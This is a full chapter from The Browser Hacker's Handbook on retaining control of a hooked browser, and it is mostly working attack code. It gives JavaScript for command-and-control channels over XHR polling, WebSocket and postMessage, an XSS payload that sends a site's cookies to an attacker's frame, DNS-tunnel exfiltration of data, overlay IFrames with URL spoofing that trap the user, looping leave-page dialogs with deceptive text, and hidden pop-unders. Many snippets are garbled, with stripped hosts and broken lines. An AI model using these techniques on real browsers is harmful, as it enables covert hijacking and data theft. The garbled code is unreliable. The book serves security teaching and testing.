Retaining Control - The Browser Hacker’s Handbook (2014)

The Browser Hacker’s Handbook (2014)

Chapter 3. Retaining Control

There is limited value in getting your foot in the door if that door gets slammed within moments. In Chapter 2, you learned how to get your foot in the door. Now you need to learn how to keep that door open. In hacking terms, this means that once you have captured the initial control of the browser, you will need to retain it. This is where the Retaining Control phase of the browser hacking methodology comes in.

Retaining control over your target can be categorized into two broad areas. These are Retaining Communication and Retaining Persistence. The primary concept of retaining a communication channel is based on establishing a mechanism to retain control with a targeted browser, or better yet, multiple browsers. Retaining persistence covers techniques that allow the communication channel to remain active despite any actions the user undertakes.

As you will see in the following chapters, many attacks need time for execution, some on the order of seconds. These timing issues are compounded when executing chained attacks, where multiple actions are combined together. Having a stable communication channel is a critical requirement for any serious browser hacking activity. Without it, your time will run out and you will be back to square one.

This chapter covers numerous techniques for retaining control of your target browser to give you time to complete your attack. However, you should not consider the methods an exhaustive list. You might already know some of them; others are less known, and some will work only on specific browser types and versions.

Understanding Control Retention

Retaining control of your target is trickier than just executing your initial instructions. Unless you’re able to somehow inject code into every page, you will lose control when the target navigates away. Ideally, retaining your control over a browser should take place not only in the face of network disconnections, but regardless of what sites the user may be visiting.

So, why do you really need to bother ensuring control is retained over a browser? If you can execute your code in a target’s browser, surely that should be all you have to do, right? Wrong, and don’t call me Shirley! Imagine you want to identify all active hosts on the target browser’s local network, and then follow up with a JavaScript port scan. This activity might take several minutes depending on the number of active hosts and the number of ports being checked. Clearly, you will need to retain control over the browser for a period of time whilst this occurs.

Retaining control over your target can be categorized into two broad areas. These are retaining communication and retaining persistence. They are both important, as they will extend your browser hacking time window.

Retaining communication can occur using numerous kinds of channels reaching back to your controlled web server. In some instances they may even be maintained over DNS without the reliance on HTTP. You can use one that gives you maximum speed but you will likely sacrifice communication with older browsers. You will explore this tradeoff in upcoming sections.

Traditional operating system rootkits achieve persistence through hooking syscalls1 and injecting code directly into the kernel or even drivers in order to persist across reboots, updates, and sometimes even after OS cleanups. In your case, when the target closes their web browser, the game is all but over, at least temporarily.


The techniques covered in both this, and the previous, chapters can be employed together to conduct what is termed Browser Hooking. Hooking a browser is the process of establishing a bidirectional communication channel with a targeted browser. You will frequently read the term “hooked browser” throughout this book. This simply means any browser that was initially coerced into executing malicious code and can now receive more commands from a central server like BeEF. When new commands are received and executed by the hooked browser, results can be asynchronously returned back to the central server.

Such communication channels enable the execution of advanced chains of attack, in the form of command modules, which can be executed in a logical order. For instance, after establishing initial control over a browser you may first want to retrieve the hooked browser’s internal IP address. Once this is uncovered, you then want to perform a ping sweep on the internal network and finally run a port scan of the responsive hosts. All of these actions can be chained together, and the flow optionally altered depending on the execution results of previous steps.

By modularizing the different attack code available within your attacker’s toolkit, a single exploit can be leveraged to perform a wide variety of actions. These actions often introduce an attacker’s feedback loop whereby a particular action may unveil a subsequent issue which, when further investigated, may expose more issues.

Exploring Communication Techniques

When examining communication, the first thing you must understand is how the communication channel works. When choosing the proper channel, you have to consider whether you want browser support or speed.

You can have a very fast channel using bleeding-edge technology that has no support for Internet Explorer 6 or Opera. Depending on your needs, this could be a limitation. For instance, you might be interested just in Chrome because you want to exploit its extensions, and then decide to use a WebSocket channel. The additional speed may necessitate the sacrifice of browser compatibility.

Almost every communication channel you can use is going to rely on some kind of polling. Polling is the client checking for changes or updates from the server. Actually implementing a polling mechanism relies on both a client and a server. In this instance the client is controlled by the JavaScript code injected into the target browser, and the server is a piece of software owned by the attacker that replies to the polling process.

The communication channel is predominantly required for two reasons: to detect client disconnections, and to communicate new commands from the server to the client. As long as the server receives the polling requests, it knows that the client is alive and ready to receive new commands.

In the following sections, a number of techniques for creating a communication channel are presented. Bear in mind that communication channels are dynamic and can be switched. For example, the default communication channel might use XMLHttpRequest polling, and then switch to a WebSocket channel if the browser supports it. WebRTC based communication channels are deliberately not covered, as these are relatively new and supported only by Chrome and Firefox, at the time of writing2.

Using XMLHttpRequest Polling

The XMLHttpRequest object is a good candidate for the default communication channel, thanks to its wide compatibility across browsers. From a BlackBerry phone or an Android system, to Windows XP with IE6, XMLHttpRequest is supported. In older versions of Internet Explorer like 5 and 6, theMicrosoft.XMLHTTP functionality needs to be instantiated as an ActiveX object, whereas from IE 7 and on, the object can be created natively.

The XMLHttpRequest mechanism that is performing communication magic is quite simple. The object is used to create asynchronous GET requests to your attacking server, in this instance, BeEF. These requests are sent on a regular basis, for example every 2 seconds, using thesetInterval(sendRequest(), 2000) JavaScript function. The BeEF server will respond in one of two ways:

· With an empty response to indicate that there are no new actions

· With a response having Content-length greater than 0 bytes if you want to instruct the victim browser to do something

As you can see in Figure 3-1, the highlighted request has a response size of 365 bytes because the server has new commands for the client.

Figure 3-1: XMLHttpRequest polling details in Firefox’s Firebug


The new logic will be additional JavaScript code leveraging JavaScript closures. For example, in the following code snippet, exec_wrapper is a closure:

var a = 123;

function exec_wrapper(){

var b = 789;

function do_something(){

a = 456;

console.log(a); // 456 -> functional scope

console.log(b); // 678 -> functional scope


return do_something;


console.log(a); // 123 -> global scope

var wrapper = exec_wrapper();



A closure, particularly in the context of JavaScript, is a special object that includes both functions and the environment in which the functions were created. What’s interesting about the previous code snippet is that, after exec_wrapper() has executed, you would expect that the b variable should be no longer accessible, especially as it was outside of the do_something() function, which was returned by exec_wrapper(). If you then execute wrapper(); you will see that 456 and 789 are returned, meaning that the b variable was still accessible.

This is because exec_wrapper is a closure, and as part of its environment, any local variables in-scope at the time of creation, are also included. Closures also come in handy when you want to emulate a private method, in order to achieve data visibility, because JavaScript doesn’t provide a native way of doing this. The result of this is a process to provide Object-Oriented programming concepts to JavaScript.

Closures are great for the purpose of adding new dynamic code because private variables (declared with var) inside the closure are hidden from the global scope3. Using a closure, you are able to associate environment data with a function that operates on that data itself.

If you were to submit the preceding code numerous times, encapsulating its logic into a closure is mandatory in order to “confine” the new code into its own function. Following BeEF’s taxonomy, the remaining examples will be referred to as command modules, because they are new commands for the browser to execute.

The idea of closures can be expanded to create a wrapper that adds command modules to a stack. Every time a polling request is completed, stack.pop() ensures the last element of the stack is removed, and then executed. The following code is a sample implementation of this approach. Thelock object and the poll() function have been excluded for brevity:


* The stack of commands.


commands: new Array(),


* Wrapper. Add the command module to the stack of commands.


execute: function(fn) {




* Do Polling. If the response is != 0, call execute_commands()


get_commands: function() {

try {

this.lock = true;

//poll the server_host for new commands

poll(server_host, function(response) {

if (response.body != null && response.body.length > 0)



} catch(e){

this.lock = false;



this.lock = false;



* Executes the received commands, if any.


execute_commands: function() {

if(commands.length == 0) return;

this.lock = true;

while(commands.length > 0) {

command = commands.pop();

try {


} catch(e) {




this.lock = false;


As you can see in the execute_commands() function, if the command stack is not empty, every single entry will be popped and executed. It is possible to call command() inside the try block because of the use of closures, meaning that the command module is encapsulated inside its own anonymous function:

execute(function() {

var msg = "What is your password?";



A function is called anonymous when it is dynamically declared at run time, without a specific name. These functions are useful when you need to execute small pieces of code, especially when that code is used just once and not in other areas. This concept is commonly used when registering anonymous functions against event handlers, for instance:

aButton.addEventListener('click',function(){alert('you clicked me');},false);

When the preceding command module lands in the target browser’s DOM, the execute() wrapper is called, and the following JavaScript code is going to be a new layer on the commands stack:

function() {

var msg = "What is your password?";



Finally, when commands.pop() runs and then tries executing the popped code, a prompt dialog box showing the msg content is displayed.

If you read the sample implementation code, you can clearly see the commands array has been implemented as a stack, also known as a Last In First Out (LIFO) data structure. You might wonder why it has not been implemented as a First In First Out (FIFO) structure instead. This is a fair question, and it mainly depends on your needs. If you need to correlate command module executions between each other, having siblings and module input depending on previous module output, a FIFO data structure might be preferable.

Using Cross-origin Resource Sharing

CORS allows a web application to specify different origins that can read HTTP responses by slightly extending the SOP. This is particularly useful if you want your central attacking server to be able to communicate with browsers visiting different origins.

The BeEF server achieves this by including the following additional HTTP response headers, allowing cross-origin POST and GET requests from anywhere:

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: POST, GET

When the XMLHttpRequest object is used to send a cross-origin GET request, if the target origin returns the previous headers, the full HTTP response can be read. When these CORS headers are not included, the SOP prevents the XMLHttpRequest object from reading the full HTTP response.

As with any specification, CORS has its implementation quirks too. In this case, Internet Explorer lacked full support until version 10, and Opera Mini lacks support altogether. IE versions 8 and 9 partially support CORS through the XDomainRequest object, but this introduced the following limits in its use4:

· Only HTTP and HTTPS schemes are fully supported.

· No custom headers are allowed in the request.

· Request content-type defaults to text/plain, and can’t be overridden.

· Cookies and other authentication request headers can’t be sent.

Using CORS as a communication channel is an effective way to maintain an ongoing relationship between a hooked browser and your server. However, sometimes you may want to use a faster channel, such as the WebSocket protocol. This is explored in the next section.

Using WebSocket Communication

The WebSocket protocol is a very fast, full-duplex communication channel. This technology enables you to have stringent event-driven actions without the explicit need to poll the server. This doesn’t mean you throw away your internal polling mechanism altogether—depending on your needs and the architecture of the communication channel, there may be benefits to keeping some form of polling.

The WebSocket API is a replacement for other AJAX-Push technologies like Comet5. Whereas Comet requires additional client libraries, the WebSocket API is implemented natively in modern browsers. As you can see in Figure 3-2, all the latest browsers, including Internet Explorer 10, support the WebSocket protocol natively. The only exceptions are some mobile browsers like Opera Mini and Android’s native browser.

Figure 3-2: WebSocket protocol support in common browsers


Various projects aim at adding WebSocket compatibility to unsupported browsers. One of the more notable projects is Socket.io6. still relies on an additional JavaScript library to be used client-side, but provides reliable connectivity by selecting the most capable transport at run time. Some of the available channels in include the WebSocket protocol, Adobe Flash Sockets, AJAX long polling, and JSONP polling.

The following code shows a very simple communication channel between a Ruby web server and a hooked browser. The following Ruby WebSocket server implementation is based on the EM-WebSocket7 library (or gem). EM-WebSocket is an asynchronous and fast EventMachine8-based implementation.

require 'em-websocket' {


:host => "",

:port => 6666,

:secure => false) do |ws|


ws.onmessage do |msg|

p "Received:"

p "->#{msg}"



rescue Exception => e

print_error "WebSocket error: #{e}"




This snippet of code binds the WebSocket server on port 6666, waiting for new messages from clients. When a message is received, a new command is sent to the client. You will note a similarity with the code presented in the previous XMLHttpRequest example: the anonymous function,function(){alert(1)}. For brevity’s sake, we are not using the execute() wrapper with closures as used before, but this code can be easily modified in order to support that.

The client-side code is written in JavaScript using the native WebSocket API. When the WebSocket channel is open, the client sends a message to the server, asking for more commands. When the server replies, the onmessage event is triggered, and the data coming from the server is executed, creating a new Function object. The data flowing through the WebSocket channel can be a String, Blob, or ArrayBuffer type. In this case, the type is String, which means the code needs to be evaluated through the process of instantiating it with new Function(). We’ve assumed the attacker server and the JavaScript code that is sent are implicitly trusted, so using Function in this way is relatively safer than using eval.

var socket = new WebSocket("ws://");

socket.onopen = function(){

console.log("Socket open.");

socket.send("Server, send me commands.");


socket.onmessage = function(msg){

f = new Function(;


console.log("Command received and executed.");


As you saw in Figure 3-2, not every browser supports the WebSocket API natively. Say by default you’re using XMLHttpRequest objects as the default communication channel in order to support more browsers, but you wanted to upgrade a particular channel to use the WebSocket protocol. First, you need to determine if the WebSocket protocol is supported. To check that it is supported you would need to fingerprint the browser’s capability. Various techniques to achieve accurate and extensive browser fingerprinting are discussed in the Fingerprinting Browsers section of Chapter 6; however, you can determine if either the WebSocket API or Mozilla’s MozWebSocket is supported with the following code:

hasWebSocket: function() {

return !!window.WebSocket || !!window.MozWebSocket;


If this returns true, you’re able to use the WebSocket protocol in your JavaScript. The MozWebSocket object is similar to the WebSocket object with a prefix, added by Mozilla in some older versions of Firefox (versions 6 to 10). The standard WebSocket object can be used without the need for a prefix from Firefox version 11.

Using Messaging Communication

As introduced in Chapter 1, window.postMessage() is another native method to achieve cross-origin communication, while respecting the SOP. Using this method requires setup; first, you need to host content for an IFrame on your attacking server, in this example



<b>Embed me on a different origin</b>

<div id="debug">Ready to receive data...</div>


window.addEventListener("message", receiveMessage, false);

function doClick() {

parent.postMessage("Message sent from " +,



var debug = document.getElementById("debug");

function receiveMessage(event) {

debug.innerHTML += "Data: " + + "\n Origin: " +


parent.postMessage("alert(1)", event.origin);





Next, you need to exploit an XSS vulnerability on the target’s site, let’s say The payload that has been injected requires JavaScript logic plus the IFrame itself. The created IFrame loads the previous code snippet. Note the to_server IFrame and the post_msg() andreceiveMessage() functions here:

<div id="debug"> </div>

<div id="ui">

<input type="text" id="v" />

<input type="button" value="Send to server" onclick="post_msg();" />

<iframe id="to_server"



<script type="text/javascript">

window.addEventListener("message", receiveMessage, false);

var infoBar = document.getElementById("debug");

function receiveMessage(event) {

infoBar.innerHTML += event.origin + ": " + + "";

new Function(;


function post_msg(domain) {

var to_server = document.getElementById("to_server");

to_server.contentWindow.postMessage("" +





You can see an example of the domain cookies that are sent to in Figure 3-3.

Figure 3-3: Breakpoint on the framed attacker’s code


After the code loaded from receives the data from a different origin, it replies back with additional JavaScript code, which is evaluated by creating a new Function on In the previous code sample a simple alert(1) was sent, as you can see in Figure 3-4.

Figure 3-4: The response is evaluated and the JavaScript is executed


window.postMessage() can be useful to communicate between different windows, such as IFrames, pop-ups, and pop-unders, and generally tabs. As always, some quirks exist across browsers. In Internet Explorer 8 and above it is possible to use window.postMessage() for IFrames only, but not for other tabs or windows. For an overview of the postMessage() support across browsers, see Figure 3-5.

Figure 3-5: window.postMessage() support in common browsers


Internet Explorer versions 8 to 10 only partially support postMessage(), whereas the WebSocket protocol is fully supported9. This is one of the main reasons you might want to consider using postMessage() as your primary communication channel (if the hooked browser is not Internet Explorer).

Using DNS Tunnel Communication

Each of the previously discussed communication channels relies on the HTTP protocol. The WebSocket protocol is the exception, but its initial handshake still relies on an HTTP request that is interpreted by an HTTP server as an Upgrade10 request such as:

GET /ws HTTP/1.1


Upgrade: websocket

Connection: Upgrade

Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==


Sec-WebSocket-Version: 13

There is nothing wrong with this, unless you are hooking browsers without a direct connection, such as those behind an HTTP proxy that logs everything and potentially inspects the content. This is where a DNS-based communication channel might come in handy, together with other evasion techniques that can be used to reduce the likelihood of detection. Only a few security solutions monitor DNS requests,11 and often their effectiveness is challenged because most modern browsers use DNS prefetching. DNS prefetching is primarily used to improve the user experience by increasing the responsiveness of loading future resources.

Kenton Born presented research12 at BlackHat 2010 leveraging DNS covert channels from the browser itself. This method is effective when data needs to be extruded only one-way from the browser to the server. However, it becomes more complex if the communication is meant to be bidirectional.

You can create a simple DNS-based unidirectional exfiltration channel that sends requests to crafted domains, which are resolved by a DNS server under your control. Such a channel could be used to pass a symmetric key to the client, in order to encrypt the data exchanged between the client and the server in subsequent HTTP request and responses. For example, if you want to send the string ABCDE using this technique you could encode the data and submit it as a subdomain resolution request. If your DNS server resolves, you can send the data payload simply by requesting an image resource, for instance <img src="">. A simple JavaScript function to generate _encodedData_ may look like this:

encode_data = function(str) {

var result="";

for(i=0;i<str.length;++i) {



return result;


var data = "data_to_extrude_from_client_to_server";

var _encodedData_ = encodeURI(encode_data(data));


The preceding code is required because domain names can contain only alphanumeric characters plus hyphens (-) and dots (.). The result of encode_data(), given the data used in the preceding code example, will be:



An additional limitation to consider is that FQDNs are limited to 255 characters, including dots. Considering these limitations, the code snippet shown earlier can be extended with the following:

var max_domain_length = 255;

var max_segment_length = max_domain_length -


var dom = document.createElement('b');

// splits strings into chunks

String.prototype.chunk = function(n) {

if (typeof n=='undefined') n=100;

return this.match(RegExp('.{1,'+n+'}','g'));


// sends a DNS request

sendQuery = function(query) {

var img = new Image;

img.src = "http://"+query;

img.onload = function() { dom.removeChild(this); }

img.onerror = function() { dom.removeChild(this); }



// Split message into segments

segments = _encodedData_.chunk(max_segment_length);

for (seq=1; seq<=segments.length; seq++) {

// send segment

sendQuery(seq+"."+segments.length+"." +



Depending on the length of the domain you’re using for your attack and the FQDN limits discussed previously, the preceding snippet is responsible for splitting the encoded data into chunks like this:


Because the data payload is likely to be bigger than a simple string of five characters, it is first split into chunks. For each chunk, a corresponding IMG element is appended to the DOM. Image tags are used because, when DNS prefetching is disabled in the browser, the src attribute will be resolved first, resulting in a DNS query. The HTTP request to retrieve the image will be issued later. Also note that if the response from your DNS server is Error or Not Found, the subsequent HTTP request will never be sent. At the same time, the DNS server would already have processed the data coming from the client. This is useful in achieving a stealthier communication.

This approach works well if you want to communicate from the client to the DNS server you control, but you might wonder how it works the other way. How can you achieve bidirectional communication, sending data from the server to the client? This is harder to achieve, but still possible.

One of the ways to implement bidirectional communication is to infer on the timing of DNS queries, meaning how long it takes for a domain to resolve. You can, for example, deduce that the server wanted to send 0 if a domain was resolved in less than a second. On the other hand, you can deduce the server wanted to send 1 if the domain was resolved in more than a second. In this way, the browser can reconstruct strings based on their binary representation, ultimately using String.fromCharCode().

A faster method is using successful and unsuccessful connections to the domains that signify each bit of data. That is, a single domain maps to a single bit of data. These resolution errors can be detected through JavaScript.

In this example, shown in Figure 3-6, the domain would represent a 1 or a 0 depending upon whether or not it resolves (and returns a resource).

Figure 3-6: Resolving domains


Two different domains have been queried in Figure 3-6 with different results. To aid in spotting the difference, the arrow points to the character that subtly varies in each request. One resolves and the other does not. This is the basis for the bit state detection in the transfer of data through the DNS tunnel from the server to the client. In this instance, the IP address is returned when a bit is to be set to true. The reason for this is explained later in this section, and shown in Figures 3-7 and 3-8.

Figure 3-7: A 1 bit is returned


Figure 3-7 shows the process of returning a 1 bit via a browser DNS tunnel. After the image has been successfully loaded (cross-origin), the onload function is called to signal the storage of the true state of the bit.

Figure 3-8: A 0 bit is returned


Figure 3-8 shows the transfer of information from the DNS tunnel again, however, in this instance a 0 bit has been communicated. After the image fails to load due to the domain not being found (cross-origin), the onerror function is called to signal the storage of the 0 state of the bit.

The binary transfer process will be set up with the browser communicating to the DNS tunnel server which IP address it should return for the true state. Now the data can start being transferred from the server to the browser using the tunnel.

The following code snippet is an example of how to retrieve a string from a DNS tunnel. Note that the first step — passing the IP address to the DNS tunnel — is skipped to simplify the demonstration. The IP address has been hard-coded in the DNS tunnel server for the snippet.

var tunnel_domain = ""; // location of the DNS server

var dom = document.createElement('b');

var messages = new Array();

var bits = new Array();

var bit_transfered = new Array();

var timing = new Array();

// Do the DNS query by reqeusting an image

send_query = function(fqdn, msg, byte, bit) {

var img = new Image;

img.src = "http://" + fqdn + "/favicon.ico";

img.onload = function() { // successful load so bit equals 1

bits[msg][bit] = 1;


if (bit_transfered[msg][byte] >= 8)

reconstruct_byte(msg, byte);



img.onerror = function() { // unsuccessful load so bit equals 0

bits[msg][bit] = 0;


if (bit_transfered[msg][byte] >= 8)

reconstruct_byte(msg, byte);





// Construct the request and send it via send_query

function get_byte(msg, byte) {

bit_transfered[msg][byte] = 0

// Request the byte one bit at a time

for(var bit=byte*8; bit < (byte*8)+8; bit++){

// Set the message number (hex)

msg_str = ("00000000" + msg.toString(16)).substr(-8);

// Set the bit number (hex)

bit_str = ("00000000" + bit.toString(16)).substr(-8);

// Build the subdomain

subdomain = "bit-" + msg_str +"-" + bit_str;

// build the full domain

domain = subdomain + '.' + tunnel_domain;

// Request something like


send_query(domain, msg, byte, bit)



// Build the environment and request the message

function get_message(msg) {

// Set variables for getting a message

messages[msg] = "";

bits[msg] = new Array();

bit_transfered[msg] = new Array();

timing[msg] =;

get_byte(msg, 0);


// Build the data returned from the binary results

function reconstruct_byte(msg, byte){

var char = 0;

// Build the last byte requested

for(var bit=byte*8; bit < (byte*8)+8; bit++){

char <<= 1;

char += bits[msg][bit] ;


// Message is terminated with a null byte (all failed DNS requests)

if (char != 0) {

// The message isn't terminated so get the next byte

messages[msg] += String.fromCharCode(char);

get_byte(msg, byte+1);

} else {

// The message is terminated so finish

delta = ( - timing[msg])/1000;

bytes_per_second = "" +

((messages[msg].length + 1) * 8)/delta;

console.log(messages[msg] + " - (" +

(bytes_per_second.substr(0,5)) +

" bits/second)");




The bits are stored in the bits array, associated with the bit number corresponding to the request. This is a convenient way to store bits, because when the array is iterated in the reconstruct_bytes function, you can use it to trivially build the data. For the sake of the example, the relevant subdomains on are statically mapped to (a Google IP). Figure 3-9 shows the results of running the previous code in Chrome:

Figure 3-9: The server sent the “Browser” string through the DNS tunnel


You can find a full working example of a bidirectional DNS-based channel on the book’s website at While using DNS requests as a communication channel does provide you with a degree of stealth, particularly in the face of web proxies that may be inspecting web requests, it won’t always be the most efficient channel of communication. In most circumstances sending cross-origin XMLHttpRequests or WebSocket requests is likely to achieve a more efficient method of communication.

Exploring Persistence Techniques

Establishing a method to communicate from a hooked browser back to your server is one thing, but persisting that communication channel over time is a little bit more complex. Keeping the connection going, even if the target navigates to a different site or they lose their Internet connectivity, requires a bit of ingenuity, and an understanding of the possible options available to you.

In the following sections, you will investigate methods to persist a communication channel that leverage IFrames, window event handling functions, dynamic pop-unders, and even extensive Man-in-the-Browser techniques. Using any one, or even a combination, of these approaches will help you with maintaining your control over your hooked browsers.

Using IFrames

The <iframe> tag is widely used as a quick way to embed another document into the current HTML page. Many advertising engines rely on the use of this tag to display marketing widgets embedded into websites.

Similar to other HTML tags and features, the <iframe> tag can also be used to mount attacks. IFrames are discussed extensively throughout the book, including the section on Detecting Cross-site Scripting Vulnerabilities in Chapter 9 that discusses the use of XssRays to discover XSS flaws. IFrames are also used in the Exploiting UI Redressing Attacks section of Chapter 4, related to Clickjacking and Cursorjacking attacks.

When you are trying to achieve persistence, IFrames can be extremely effective for a couple of reasons. First, you have complete control over the IFrame’s DOM content, meaning that CSS can be also controlled. Second, the fact that IFrames are primarily used to embed another document into the current page offers a direct method to persist your communication channel.

Using Full Browser Frame Overlay

Thanks to the control you have over the IFrame’s DOM, including HTML, CSS, and JavaScript, an IFrame can be used to load the current page into an overlay, keeping the communication channel alive in the background. An overlay in this context means a page component, such as an IFrame that is visible in the foreground of the page, while code and other elements are invisible in the background, continuing to execute their logic. On top of this, the HTML5 History API also comes in handy here, especially when masking the real URL in the address bar.

Imagine a web application with a Reflected XSS vulnerability before the user authenticates. You have already hooked the target, but the XSS is not persistent, so to prevent losing connectivity with the target’s browser you create an overlay IFrame. It doesn’t have borders, stretches the width and height to 100 percent and has the source attribute pointing to the web application login page.

A fraction of a second after the IFrame is rendered, the hooked browser will show the content of the login page, while keeping the previous URI in the address bar. Any activity the target performs on the page will happen inside the overlay IFrame, effectively trapping the target in a new frame. At the same time, in the background, the communication channel still works and you can send further commands and continue activities with the target’s browser.

The target is unlikely to spot the attack. The only noticeable events are the reload of the page when the IFrame is rendered, and the address bar containing a different URI from what the target may expect.

An example of how to create an overlay IFrame using jQuery is shown in the following code snippet:

createIframe: function(type, params, styles, onload) {

var css = {};

if (type == 'hidden') {

css = $j.extend(true, {

'border':'none', 'width':'1px', 'height':'1px',

'display':'none', 'visibility':'hidden'},



if (type == 'fullscreen') {

css = $j.extend(true, {

'border':'none', 'background-color':'white', 'width':'100%',


'position':'absolute', 'top':'0px', 'left':'0px'},


$j('body').css({'padding':'0px', 'margin':'0px'});


var iframe = $j('<iframe />').attr(params).css(


return iframe;


The function can create both overlay (if type == ‘fullscreen’) and hidden IFrames. The differences in the creation of these two types of IFrames, from the code, are just CSS selectors. For hidden IFrames the smallest IFrame size (1 pixel) is used, together with no borders. The element is then hidden using both the visibility and display selectors. For overlay IFrames instead, the dimensions of the element are maximized, removing any additional space from the top and left window regions. Hidden IFrames are particularly useful when launching exploits, and are covered in the following chapters.

To embed a document through the overlay IFrame, you need to specify custom CSS selectors to remove borders and position the new element correctly, including dimensions in the browser window. The correct dimensions are 100 percent width and height, with 0 pixel margins and padding. If these are combined with an absolute element positioning, the IFrame will perfectly match the current browser window borders.

In the previous example persistence is achieved by using jQuery to extend the already existing CSS styles. The overlay IFrame is created by calling the createIframe function, as in the following code. In this example, the same-origin login.jsp page is loaded, without any additional CSS rules or callbacks.

createIframe('fullscreen',{'src':'/login.jsp'}, {}, null);

In instances where the initial hooked page is something different, for example /page.jsp, the user might suspect something is wrong after the overlay IFrame is created. The content in the page is from /login.jsp, but the URI still says /page.jsp. To overcome this issue, you can leverage the HTML5 History API13:

history.pushState({be:"EF"}, "page x", "/login.jsp");

Executing the previous code will result in the browser changing the URL bar to http://<hooked_domain>/login.jsp. For obvious security reasons, you must pass a same-origin URL to pushState; otherwise you get a security exception. The interesting thing about manipulating the browser history with pushState is that the resource, for instance /login.jsp, is not loaded by the browser and doesn’t even need to exist.

The use of IFrames to persist your control over a target’s browser is just one available technique at your disposal. The benefit of IFrames is that they’re generally well supported by browsers, and the ability to overlay the current content increases the likelihood that your hook will remain undetected. There are some limiting factors to this technique. If the content you want to frame includes frame-busting code, or restrictive X-Frame-Options headers, then you may have to investigate using one of the techniques discussed in the following sections instead.

Using Browser Events

Have you ever seen websites that ask you for confirmation before they close? This behavior can be exceptionally irritating, especially if the site keeps on asking the same question every time you click OK on the dialog box.

This is exactly what you can do to increase the time a target will stay on a specific page that you have control of. In certain circumstances, remaining on the hooked page a couple of seconds longer results in a few more command modules being executed. Remember, the longer you keep the browser hooked, the better.

This technique relies on handling the onbeforeunload event associated with the window object, which is triggered by default on the following conditions:

· When the unload event is fired — you closed the current tab, the whole browser, or simply navigate away

· When window.close or document.close are called

· When location.replace or location.reload are called

Following is a basic implementation that works in all desktop browsers except Opera prior to version 12:

function display_confirm(){

if(confirm("Are you sure you want to navigate away from this

page?\n\n There is currently a request to the server pending.

You will lose recent changes by navigating away.\n\n Press OK

to continue, or Cancel to stay on the current page.")){




function dontleave(e){

e = e || window.event;

// if the browser is Internet Explorer, slightly different syntax


e.cancelBubble = true;

e.returnValue = "There is currently a request to the server

pending. You will lose recent changes by navigating away.";


if (e.stopPropagation) {



e.returnValue = "There is currently a request to the server

pending. You will lose recent changes by navigating away.";



//re-display the confirm dialog, annoying the user if he clicks OK


return "There is currently a request to the server pending. You

will lose recent changes by navigating away.";


window.onbeforeunload = dontleave;

This example will override any existing code that already manages the onbeforeunload event and make it execute the dontleave function. As an additional precaution, the cancelBubble method will stop the propagation of commands with the stopPropagation() function within Internet Explorer. This prevents existing functions from interfering with the new code. Depending on the complexity of the existing JavaScript code, disabling event bubbling is also a good idea for performance reasons. If there are many nested elements, simply overriding the existing code while preventing bubbling may be a good choice.

The behavior is slightly different depending on the browser. In Figures 3-10 and 3-11 you can see the behavior in Firefox 18. The second confirm dialog box opens automatically if the victim clicks Cancel. If the victim clicks OK, the dialog box will be re-displayed in a loop. The only possible action to really leave the page is to click Leave Page as shown in Figure 3-11.

Figure 3-10: First dialog on Firefox 18 with custom content (controlled with JavaScript)


Figure 3-11: Second dialog on Firefox 18 (can’t be controlled with JavaScript)


The behavior is very similar in Internet Explorer 9 on Windows 7, but you have slightly more control over the dialog box text, as you can see in Figures 3-12 and 3-13. The text of the second dialog box, in Figure 3-13, can also be customized. The overall behavior remains the same as Firefox, though.

Figure 3-12: First dialog box on IE 9 with custom content (controlled with JavaScript)


Figure 3-13: Second dialog box on IE 9 (controlled with JavaScript)


As a result, you might want to use the OnClose technique only on Internet Explorer browsers, given the limited message customization functionality in Firefox and Chrome.

As a method for maintaining your persistence, using these events may provide you with a few more seconds of execution time, but they’re certainly not ideal at keeping control over a target’s browser. Using a pop-under window, which will be discussed in the next section, may offer you a new opportunity to retain some form of control over the hooked browser. Of course, there’s no reason why you can’t combine a number of techniques, by layering these custom close event handling routines; with IFrames and pop-under windows, you may succeed in maintaining your hook just long enough to complete that command you were waiting for.

Using Pop-Under Windows

When you browse to a website, there is nothing more annoying than an unprompted pop-up. How many times have you been forced to repeatedly close multiple pop-ups displaying advertisements? Whereas a pop-up is a new browser window that appears in the foreground of the current browser page, a pop-under is a new browser window that appears in the background, literally under the current browser window. Most modern browsers block pop-under behavior by default.

The easiest way to open a pop-under with JavaScript is by using the method. The following code will be blocked by default in the latest versions of Firefox and Chrome:'','popunder','toolbar=0





The script is blocked because the browser realizes the new window will open without any user intervention, such as an explicit mouse click.

You might start to think how you can bypass this behavior. The first potential solution to examine is by using MouseEvents to programmatically instrument mouse actions through JavaScript code. Suppose you have a link you control, either by creating it dynamically or by exploiting an XSS vulnerability within an onClick attribute, similar to the following:

<a id="malicious_link" href=""

onclick=" open_link()">Goo</a>

Now inject the following JavaScript in the same page:

function open_link(){'','popunder','toolbar=0,






function clickLink(link) {

var cancelled = false;

if (document.createEvent) {

var event = document.createEvent("MouseEvents");

event.initMouseEvent("click", true, true, window,

0, 0, 0, 0, 0, false, false, false, false, 0, null);


}else if(link.fireEvent){





The preceding code tells the browser to execute the clickLink() function on the A element with the given ID, which contains the call inside the onClick event. Unfortunately, this experiment will still not work because a MouseEvent created with JavaScript is not the same as a real user click.

To bypass this limitation, instead of relying on creating mouse events, you can be craftier and use JavaScript to add or overwrite onClick attributes on existing page links. This technique will be expanded further in the Man-in-the-Browser attacks section.

The following code retrieves all the <a> tags on the page, adding an onClick attribute that when triggered will open the pop-under. The $.popunder() function is a jQuery plugin14 written by Hans-Peter Buniat that creates cross-browser pop-under windows.

var anchors = document.getElementsByTagName("a");

for (var i = 0; i < anchors.length; i++) {




// the aPopunder object is defined in the next code snippet

anchors[i].setAttribute("onclick", "$.popunder(aPopunder)")


When the user clicks one of the page links, the URI in the href attribute will be opened, together with the pop-under. The pop-under is not blocked by default in modern browsers. The only browser that is not vulnerable in this instance is Opera.

Expanding on this, if you want to be as stealthy as possible, you can position the pop-under exactly behind the current browser window. You can achieve this by measuring the position of the current browser window using window.screenX and window.screenY. The height and width of the pop-under has to be set to at least 1 pixel because 0 pixels is blocked by most browsers. However, in most circumstances the resulting pop-under will be greater than 1 pixel, as you can see in Figure 3-14. Note that the pop-unders have been manually positioned at the left of the main browser window, otherwise they would have been invisible to the user:

Figure 3-14: Different pop-under dimensions in Firefox and Safari


Using this information, you can modify the $.popunder() function in the following way:

var aPopunder = [

['', {"window": {height:1,

width:1, left:window.screenX, top:window.screenY}}];


